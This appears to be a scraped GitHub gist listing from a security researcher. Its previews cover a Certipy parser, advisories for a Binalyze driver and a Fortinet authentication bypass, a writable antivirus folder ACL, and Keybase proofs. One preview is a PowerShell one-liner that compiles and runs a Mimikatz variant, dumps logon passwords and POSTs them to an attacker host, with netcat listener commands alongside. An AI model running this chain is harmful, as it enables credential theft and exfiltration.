dru1d-foofus

#! /usr/bin/env python3

#######################
# Certipy JSON Parser #
#       dru1d         #
#######################

import json
import argparse

dru1d-foofus

CVE-2023-41444 - Binalyze IREC.sys Vulnerable Driver

Credits

Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)

Description

An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.

Vulnerability Type

Incorrect Acess Control

dru1d-foofus

Summary An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

Exploitation Status: Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user="Local_Process_Access" Source: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

===Methodology===

A FortiOS 7.0.6 virtual appliance VM was acquired from the Fortinet portal. This was subsequently deployed into a lab environment where further testing would take place.

dru1d-foofus

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native
Owner  : BUILTIN\Administrators
Group  : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow  Modify, Synchronize
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456

dru1d-foofus

Credits: https://github.com/caseysmithrc and https://github.com/xillwillx
#On attacker machine:
#nc -lkvp 80 >> katz-listener.log
#SSL encrypted traffic
#ncat -lkvp 443 --ssl

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe  && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit

#SSL - encrypted traffic
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl

dru1d-foofus

Keybase proof

I hereby claim:

• I am dru1d-foofus on github.
• I am dru1d (https://keybase.io/dru1d) on keybase.
• I have a public key whose fingerprint is 51BC 25F6 D8CF 9489 A695 5B2E 75D2 3F1F C023 37F4

To claim this, I am signing this object:

dru1d-foofus

Keybase proof

I hereby claim:

• I am tylerdru1d on github.
• I am dru1d (https://keybase.io/dru1d) on keybase.
• I have a public key whose fingerprint is 16BE 864F AB13 1A3F BAB7 9D68 0A45 A12E 5B78 5293

To claim this, I am signing this object: